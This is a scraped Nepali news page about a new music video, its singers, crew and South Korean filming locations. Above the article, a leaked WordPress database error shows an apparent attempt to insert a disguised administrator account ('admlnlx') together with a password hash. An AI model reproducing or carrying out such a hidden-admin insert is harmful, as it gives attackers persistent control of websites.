WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkI7dnL9SGFWtKQrDCXNd2SBxVAWEP0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 11:17:51', '', 'admlnlx', 'admlnlx')
मेलिना राई र समीर लिम्बुको स्वरमा रहेको “आँखा अघि राखे तिमीलाई” बोलको म्युजिक भिडियो सार्वजनिक गरिएको छ । गीतमा सदोक मल्लको शब्द रचनामा कमल रसाईलीले संगीत भरेका छन भने आमोस तामाङले संगीत संयोजन गरेका हुन ।
दक्षिण कोरियाको विभिन्न रमणिय ठाउँहरूमा म्युजिक भिडियोको क्षयाङकन गरिएको हो । उक्त म्युजिक भिडियोमा दिनेश नाछिरीङ राई र एलिना थापा मगरको फिचरिङ्ग गरेका छन् । म्युजिक भिडियोमा हाङ चेम्जोङले निर्देशन गरेका छन भने पेंजी योङ्गको छायांकन र विकास ज्ञवालीले सम्पादन गरेका हुन ।
सोलुखुम्बु जिल्लाको सोताङ गाउँपालिकमा जन्मेका दिनेश नाछिरिङ्ग राई रोजगारिको सिलसिलामा प्रवासमा रहेर पनि नेपाली गीत संगीत र कला क्षेत्रमा योगदान दिंदै आएका छन । नाछिरीङले यस अघि थुप्रै म्युजिक भिडियोहरुमा अभिनय गरि सकेका छन् ।